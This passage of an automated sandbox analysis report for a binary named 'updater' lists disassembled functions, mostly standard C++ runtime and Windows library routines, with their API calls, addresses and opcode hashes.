Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: f316e54840fc9bbfa81c60fd16930750199d863e1553edb74915c2afeda9339c
Instruction ID: 1aecb32edf19ed7f230238294c8ac6ba0817bca688a04957f4282777e6f8d45f
Opcode Fuzzy Hash: f316e54840fc9bbfa81c60fd16930750199d863e1553edb74915c2afeda9339c
Instruction Fuzzy Hash: 1C51F436A00315AFDB22DF6EC841A6B77F4FF58760F14456EE906E7264E731EA018B50

Uniqueness

Uniqueness Score: -1.00%

Function 0140CCC7 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0140CD10
__alloca_probe_16.LIBCMT ref: 0140CD3C
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0140CD7B
__alloca_probe_16.LIBCMT ref: 0140CDEF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0140CE50

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16
String ID:
API String ID: 2135360126-0
Opcode ID: 515501be82aeef8813784b7026a5046e3e4f84c6fdbafbbac8dffb8c72154f81
Instruction ID: b19a6d0b2f1a35809d71710b93f41751fed68e95b2794569f900a7fcf2785589
Opcode Fuzzy Hash: 515501be82aeef8813784b7026a5046e3e4f84c6fdbafbbac8dffb8c72154f81
Instruction Fuzzy Hash: ED51D472910206EBEF225F6ACC80FAB7FA9EF50A50F15467AEE05962E0D7358D11C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 013D337C Relevance: 7.6, APIs: 5, Instructions: 121filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32 ref: 013D33CC
Sleep.KERNEL32(00000001), ref: 013D33DA
UnlockFile.KERNEL32 ref: 013D3423
LockFile.KERNEL32 ref: 013D3457
LockFile.KERNEL32 ref: 013D3492

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: File$Lock$SleepUnlock
String ID:
API String ID: 1216273398-0
Opcode ID: aeb5443fd287d5e8ce8263c64bc7eed186561b02a6576b81ce09cc6f10235a7f
Instruction ID: c494454c0cf1c1038bae8821af0b25c05953113f681da2b7f4c889a859dcc206
Opcode Fuzzy Hash: aeb5443fd287d5e8ce8263c64bc7eed186561b02a6576b81ce09cc6f10235a7f
Instruction Fuzzy Hash: 1A31C9FA740715BBEB334A18AC817A9BAB0BB00B69F108125FE457B2C0D775DD50C782

Uniqueness

Uniqueness Score: -1.00%

Function 013FB5E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 013FB606
_Maklocstr.LIBCPMT ref: 013FB623
_Maklocstr.LIBCPMT ref: 013FB640
_Maklocchr.LIBCPMT ref: 013FB652
_Maklocchr.LIBCPMT ref: 013FB665

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: 64c453e9ea6c0a0ff927e83b1916d954cf28d7949648e73b9c5e2c52e748bea5
Instruction ID: ef209d302630cd07c18430f00f9fada3e02e0cc6e8a2f6429de2f47810b61a94
Opcode Fuzzy Hash: 64c453e9ea6c0a0ff927e83b1916d954cf28d7949648e73b9c5e2c52e748bea5
Instruction Fuzzy Hash: 61118CF1900785BFE3209BA9C880F12FBACEF59618F04451EF2858BA40D374F85487A5

Uniqueness

Uniqueness Score: -1.00%

Function 013FC1C8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC1D9
int.LIBCPMT ref: 013FC1F0

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC22A
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC24A
Concurrency::cancel_current_task.LIBCPMT ref: 013FC257

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: a499bfa064924954e5a76565ea678dcae702095a836f7212d229f20f39fa4832
Instruction ID: bb4efc17bc4b98610f40c6e12e08f9153d6852c4fb42e213372c6c6592864fb8
Opcode Fuzzy Hash: a499bfa064924954e5a76565ea678dcae702095a836f7212d229f20f39fa4832
Instruction Fuzzy Hash: 8A01047590011AABCF01EBA89814AFD7B74FFA4718F18050DEA15672E1DF309A01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FC387 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC398
int.LIBCPMT ref: 013FC3AF

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC3E9
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC409
Concurrency::cancel_current_task.LIBCPMT ref: 013FC416

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6f051c7fe533a726fe2fd02a5c0b13d54b87b4c5ba401256b1b2b4055af16fbf
Instruction ID: 93ab3c22dbe064710bed2db6687d13c1f458e57412c9740d17860d6440c3f089
Opcode Fuzzy Hash: 6f051c7fe533a726fe2fd02a5c0b13d54b87b4c5ba401256b1b2b4055af16fbf
Instruction Fuzzy Hash: 2301D275D4021A9BCB12EBA8D854AFD7BB1BFA4358F18040DEA11BB2E0DF749E01C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FC25D Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC26E
int.LIBCPMT ref: 013FC285

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC2BF
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC2DF
Concurrency::cancel_current_task.LIBCPMT ref: 013FC2EC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 938eb12cc7e405435cae4435f8fe8ac392f2eea2b37367315099585c15ffb005
Instruction ID: ca42b6215b98dc2ddd2a5a6ac7f478e6e6647f7c0643d3c6fad4a88d55ada317
Opcode Fuzzy Hash: 938eb12cc7e405435cae4435f8fe8ac392f2eea2b37367315099585c15ffb005
Instruction Fuzzy Hash: 1201C47590011AABCF01EBA89854ABE7B75FFA4319F14000DEA04A72D0DF349E01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FC2F2 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC303
int.LIBCPMT ref: 013FC31A

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC354
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC374
Concurrency::cancel_current_task.LIBCPMT ref: 013FC381

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 235448ff6519b5815258438a744f9f43a5d637f6af413fcc936b7ddc132b5b7a
Instruction ID: 7d9ed6d168d4c49c5b7745825ab7c4b78da3af22739ed432314d571e64d9deef
Opcode Fuzzy Hash: 235448ff6519b5815258438a744f9f43a5d637f6af413fcc936b7ddc132b5b7a
Instruction Fuzzy Hash: 9D01D67590011A9BCB11EB68D954ABDBBB4FFA4358F18010EEA00672E0DF349A01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FC705 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC716
int.LIBCPMT ref: 013FC72D

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC767
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC787
Concurrency::cancel_current_task.LIBCPMT ref: 013FC794

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 23de93358a5fca0b52373bb68ff09c956e69fe108dfb063e6239375404869cb9
Instruction ID: 16559890b919090c72c21d5327b380e539ed1814e96469d5373474846b3907a8
Opcode Fuzzy Hash: 23de93358a5fca0b52373bb68ff09c956e69fe108dfb063e6239375404869cb9
Instruction Fuzzy Hash: F301C07590011AAFCB15EBA99850AADBB74BFA4328F28041DEA10A76E0DF749A45C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FC79A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC7AB
int.LIBCPMT ref: 013FC7C2

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC7FC
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC81C
Concurrency::cancel_current_task.LIBCPMT ref: 013FC829

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b8a3f86fbe03336c8a3a59d59df1ce2153b00a51f7ce2ef0eacd4214cbed8e60
Instruction ID: a2a78cca68f455d48a3fa24cbe1f5af63cc34ab592877591f42be4193e462675
Opcode Fuzzy Hash: b8a3f86fbe03336c8a3a59d59df1ce2153b00a51f7ce2ef0eacd4214cbed8e60
Instruction Fuzzy Hash: B301227590011A9FCB01EB68D850AFDBBB0BFA432CF18051DEA10A72E1DF309E01C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FC670 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC681
int.LIBCPMT ref: 013FC698

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC6D2
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC6F2
Concurrency::cancel_current_task.LIBCPMT ref: 013FC6FF

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c1a223d08e65b511a574677c158167539c58e8fc1110ec2235563589d1ca6e3d
Instruction ID: 1176d332dc6ef1c255a5d1616b39b4333c5700dfb1622d5981c9207f67d6726e
Opcode Fuzzy Hash: c1a223d08e65b511a574677c158167539c58e8fc1110ec2235563589d1ca6e3d
Instruction Fuzzy Hash: B501D67190011A9BCB11EB68D850ABD7BB1BFA4328F18401EDA10AB3E0DF34DE01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FC9EE Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC9FF
int.LIBCPMT ref: 013FCA16

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FCA50
std::_Lockit::~_Lockit.LIBCPMT ref: 013FCA70
Concurrency::cancel_current_task.LIBCPMT ref: 013FCA7D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 1105b9414eb707b9db21e08b7cab1593d92e95ce3c117f3b2da22cc504844684
Instruction ID: 42441c7642c3ab28591f0968648d4f7b4d24de16580a8fce86bb551da89a8b53
Opcode Fuzzy Hash: 1105b9414eb707b9db21e08b7cab1593d92e95ce3c117f3b2da22cc504844684
Instruction Fuzzy Hash: 51014575D0011A9BCF05EB68D854AFD7B70BFA0368F28051DEA11A72E0DF30AA05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013FC82F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC840
int.LIBCPMT ref: 013FC857

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FC891
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC8B1
Concurrency::cancel_current_task.LIBCPMT ref: 013FC8BE

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 60aa8aea3e49acd04524578e35f36887751b759c034460af02ed730b30ddedb1
Instruction ID: 84deaaf1eff331a7cd0d64b72dbdd9bd9442c20bd36273b2c7b79796399320e9
Opcode Fuzzy Hash: 60aa8aea3e49acd04524578e35f36887751b759c034460af02ed730b30ddedb1
Instruction Fuzzy Hash: A401C471D0011AAFDB15AB68D850ABDBB75BFA4728F14441DDA10672E0DF749E01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FCB18 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FCB29
int.LIBCPMT ref: 013FCB40

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FCB7A
std::_Lockit::~_Lockit.LIBCPMT ref: 013FCB9A
Concurrency::cancel_current_task.LIBCPMT ref: 013FCBA7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c66e52fe4fe3fcb2fd594795d9591f2543ae439d99898fef45652d7b6d7204b3
Instruction ID: fcd77c1f2fc5a9ede32fcab403cc6ae3d0fdbf2663e64e92dba6be257fc6fe43
Opcode Fuzzy Hash: c66e52fe4fe3fcb2fd594795d9591f2543ae439d99898fef45652d7b6d7204b3
Instruction Fuzzy Hash: B501D27590021E9BCB11EB68D854ABDBBB5BFA4368F18041DEA10AB6E0DF749E01C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FCBAD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FCBBE
int.LIBCPMT ref: 013FCBD5

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FCC0F
std::_Lockit::~_Lockit.LIBCPMT ref: 013FCC2F
Concurrency::cancel_current_task.LIBCPMT ref: 013FCC3C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 2cda9b923cd7ac35daa7faa369b47f29cefe074d44ab493dc72e48c6565b3d63
Instruction ID: d157c97931176529791bbe7206d4031fc3e7d5126f8d678db61e0b5f052c9ea4
Opcode Fuzzy Hash: 2cda9b923cd7ac35daa7faa369b47f29cefe074d44ab493dc72e48c6565b3d63
Instruction Fuzzy Hash: 9501D67590011A9BCB05EB68D850AFDBB71BFA4318F18451DEA00673E1DF749E02C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FCA83 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FCA94
int.LIBCPMT ref: 013FCAAB

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013FCAE5
std::_Lockit::~_Lockit.LIBCPMT ref: 013FCB05
Concurrency::cancel_current_task.LIBCPMT ref: 013FCB12

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: d5dd2f1a8b7b87722269a4b9cdaddc7a4cf5cb399c7c57dc6e57700ffb91155a
Instruction ID: 32350c77ba8ee7f9be2f4333807b6716276555b3ccf8d58d8c91520fba8e05db
Opcode Fuzzy Hash: d5dd2f1a8b7b87722269a4b9cdaddc7a4cf5cb399c7c57dc6e57700ffb91155a
Instruction Fuzzy Hash: 7D01007690011A9BCB01EB689811EADBB70BFA0318F18000EEA01A72E0DF749E05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013F6FD4 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013F6FE5
int.LIBCPMT ref: 013F6FFC

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013F7036
std::_Lockit::~_Lockit.LIBCPMT ref: 013F7056
Concurrency::cancel_current_task.LIBCPMT ref: 013F7063

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 738ac6f363c24d84896ce15bca2fadb8907669f3cd057725341c560439d3de91
Instruction ID: ad1dcebfebd8974cd63b506d85042842e2e6c90649d41b9e1f66d0b15d80136d
Opcode Fuzzy Hash: 738ac6f363c24d84896ce15bca2fadb8907669f3cd057725341c560439d3de91
Instruction Fuzzy Hash: 6201D2B5D001179BCB11EB68D850ABDBB75BFA4368F28440DEA10A72E0DF749E05CB81

Uniqueness

Uniqueness Score: -1.00%

